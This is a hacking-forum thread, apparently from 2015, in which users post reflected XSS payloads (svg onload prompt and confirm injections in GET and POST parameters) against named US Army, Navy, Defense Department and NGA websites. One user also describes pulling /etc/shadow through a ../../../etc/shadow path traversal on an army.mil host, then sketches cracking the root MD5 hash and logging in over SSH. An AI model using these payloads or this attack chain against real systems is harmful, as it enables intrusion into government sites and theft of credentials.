More .mil XSS (US Army + US Navy + Department of Defense + NGA)
#1
US Army (GET-based + POST-based):

-- GET:
Quote:https://www.qmo.amedd.army.mil/protected/QMVTC.php?dir="><svg/onload=prompt(/XSS/)>

-- POST:
Quote:http://rivergages.mvr.usace.army.mil/Wat...earch2.cfm

input:
Quote:fld_search=%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FXSSPOSED%2F%29%3E&Submit=Search



Department of Defense (Office for Secretary of Defense):

Quote:https://www.dmdc.osd.mil/appj/dwp/search...T%22%29%3E



US Navy (POST-based):

Quote:https://www.cnatra.navy.mil/pubs.asp

POST input:
Quote:searchTextbox="><svg%2Fonload%3Dconfirm('XSS')>


National Geospatial Intelligence Agency:

Quote:https://datahost.nga.mil/elist/email_esc.../script%3E
Reply
#2
Pretty crazy to think that mil websites have xss vulnerabilities :) Nice find!
Reply
#3
(12-18-2015, 04:00 PM)Insider Wrote: Pretty crazy to think that mil websites have xss vulnerabilities Smile Nice find!

Had something wayyyy more crazy in army.mil but its patched now. Basically it was vulnerable to LFD at the following path: https://mesl.apgea.army.mil/mesl/account...etc/shadow

and yes, you could actually download the output of their shadow file. for some retarded reason that was beyond me they had their http daemon running as a root user, no $6 hash types in /etc/shadow - just plain md5 along with open SSH ports. Someone could have literally cracked the md5 for the root user and SSH'd into the box @ uid0.
Reply
#4
(12-18-2015, 04:11 PM)MLT Wrote:
(12-18-2015, 04:00 PM)Insider Wrote: Pretty crazy to think that mil websites have xss vulnerabilities Smile Nice find!

Had something wayyyy more crazy in army.mil but its patched now. Basically it was vulnerable to LFD at the following path: https://mesl.apgea.army.mil/mesl/account...etc/shadow

and yes, you could actually download the output of their shadow file. for some retarded reason that was beyond me they had their http daemon running as a root user, no $6 hash types in /etc/shadow - just plain md5 along with open SSH ports. Someone could have literally cracked the md5 for the root user and SSH'd into the box @ uid0.

Damn! That is crazy, I don't even see much of LFI/LFD vulnerabilities nowadays. Maybe I'm not looking good enough.
Reply
#5
(12-18-2015, 04:25 PM)Insider Wrote: Damn! That is crazy, I don't even see much of LFI/LFD vulnerabilities nowadays. Maybe I'm not looking good enough.

I honestly wasnt expecting it to work, I just saw a ?filename= param while testing for xss and was just like ../../../etc/shadow as input before even thinking. was gobsmacked when it actually downloaded their shadow file.
Reply
#6
Yet another found in the National Geospatial Intelligence Agency:

Quote:http://msi.nga.mil/NGAPortal/MSI.portal?...main%29%3E
Reply
#7
and another in Department of Defense (this is an interesting vector)

Quote:http://www.militaryinstallations.dod.mil...omain%29//
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 546 06-16-2020, 11:51 AM
Last Post: LaZr4us
  Guide to XSS (Examples included) NO-OP 3 12,376 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,754 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,181 04-24-2019, 08:32 PM
Last Post: thunder